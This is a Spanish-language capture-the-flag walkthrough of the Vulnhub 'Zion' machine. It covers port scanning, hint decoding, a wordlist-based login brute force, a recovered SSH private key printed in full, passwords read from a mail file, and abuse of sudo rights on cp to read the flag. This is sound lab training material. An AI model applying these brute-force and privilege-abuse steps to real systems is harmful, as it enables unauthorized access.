[VLN] Zion

Hoy vamos a hackear la maquina de Vulnhub llamada Zion. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/zion-11,476/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:01 CEST Nmap scan report for 192.168.1.78 Host is up (0.00096s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: |_ 2048 92:4b:37:54:79:d2:a8:e2:b1:90:f6:f0:95:73:75:14 (RSA) 80/tcp open http Apache httpd (PHP 7.4.5) |_http-server-header: Apache |_http-title: 403 Forbidden Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 126.58 seconds
    Al meternos en la web, si elegimos el boton "Truth", en la respuestas nos aparece lo siguiente:
    Matrix-Banner: RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQn IGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnMg JycrIiwgIi0iLCAiLyIgYW5kICI9Ii4=
    Matrix-Message: 7FIdtgEWjK69TYIYCpDwyx9ucnDDusp2s8nGAw9ChJ5b9SCT4MmBdI38X5DPerIEQS9zdQauLhJsN9SL YWhmNJ128htAUKBx5pf9SCXQq308ZN8sMtah0No4z2mrKlIJwMsO8gILIzme4Pb8xuB9sUtqxI9XWWl9 z1Cqv9y8bs3o47BC3msuzdAcBAB8hzbVO04Wqu8xhLe77IVcr9OEJEMCCgO89J4YJ0R7MO88gIJQOVkX 9t8XANRXyCWjw8xmUdF1pGK3bHyFgqQo
    El Matrix-Banner es base64 con lo cual hacemos el decode para ver que indica.
    sml@Cassandra:~$ echo "RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQ nIGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnM gJycrIiwgIi0iLCAiLyIgYW5kICI9Ii4" | base64 -d
    El mensaje es el siguiente:
    Decrypt the message that Zion left for you. 'Open your mind' and remember to base it on not using any of the characters ''+", "-", "/" and "=".
    Con esa pista, habla de base62, asi que cogemos el "Matrix-Message" y hacemos el decode de base62: http://decode-base62.nichabi.com/ Al hacer el decode obtenemos:
    The username/password information for accessing the "Zion's System" is on the page where you made your choice. To make it easier, the user "morpheus.thematrix" likes the simplicity of his passwords.
    Sabiendo esto preparamos un diccionario con todas las palabras que aparecen en la web, y las pasamos a minusculas, ya que es "lo mas simple".
    sml@Cassandra:~$ cewl http://192.168.1.23 > dict1.txt sml@Cassandra:~$ cat dict.txt | tr '[:upper:]' '[:lower:]' > dict2.txt
    Ahora que tenemos el diccionario (dict2.txt) arrancamos burp, y hacemos bruteforce. Despues del "bruteforce" vemos que la password es: interpreted. Nos logueamos en la web y habla del usuario w.rabbit. Vamos a private key...y podemos ver una key RSA a la que le falta la tipica "linea" inicial y final, asi que las agregamos, y pegamos en medio la private key. Quedaria asi:
    -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
    Lo guardamos como rabbit.key y le damos los permisos correspondientes:
    sml@Cassandra:~ $ chmod 600 rabbit.key
    Probamos a conectarnos usando esta key, y el usuario w.rabbit.
  • Low shell
  • sml@Cassandra:~$ ssh -i rabbit.key w.rabbit@192.168.1.23 [w.rabbit@zionserver ~]$ cat warning.txt Congratulations on making it this far. The goal is to read the /home/dozer/flag.txt file. Use the method and techniques you prefer.
    Inspeccionamos el sistema y vemos que /var/mail/w.rabbit contiene datos que nos interesan :)
    [w.rabbit@zionserver bin]$ cat /var/mail/w.rabbit Remember to write down the new password before I forget it. OLDPASS: Admin129 NEWPASS: P@s5w0rd#2020
    Sabiendo la password, miramos si podemos usar sudo...
  • flag.txt (dozer)
  • w.rabbit@zionserver mail]$ sudo -l [sudo] password for w.rabbit: User w.rabbit may run the following commands on zionserver: (dozer) /bin/cp
    Podemos usar cp, y lo que necesitamos es leer /home/dozer/flag.txt... asi que:
    [w.rabbit@zionserver ~]$ /bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/fuckingflag.txt [sudo] password for w.rabbit: [w.rabbit@zionserver ~]$ cat /tmp/fuckingflag.txt __ __ _ \ \ / /__| | ___ ___ _ __ ___ ___ \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ \ V V / __/ | (_| (_) | | | | | | __/ \_/\_/ \___|_|\___\___/|_| |_| |_|\___| _____ _____ _ ______ |_ _|_|_ _| |__ ___|__ (_) ___ _ __ | |/ _ \| | | '_ \ / _ \ / /| |/ _ \| '_ \ | | (_) | | | | | | __// /_| | (_) | | | | |_|\___/|_| |_| |_|\___/____|_|\___/|_| |_| ---------------------------------------------- Congratulations!! Hope you enjoyed Zion:1. Just wanted to send a big thanks out there to all those who have privied feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @mrhenrike So, take your award: flag = challUG{Th1nk_0u7_0f_th3_60x}
  • End
  • Y con esto ya tendriamos el flag del "dozer" :)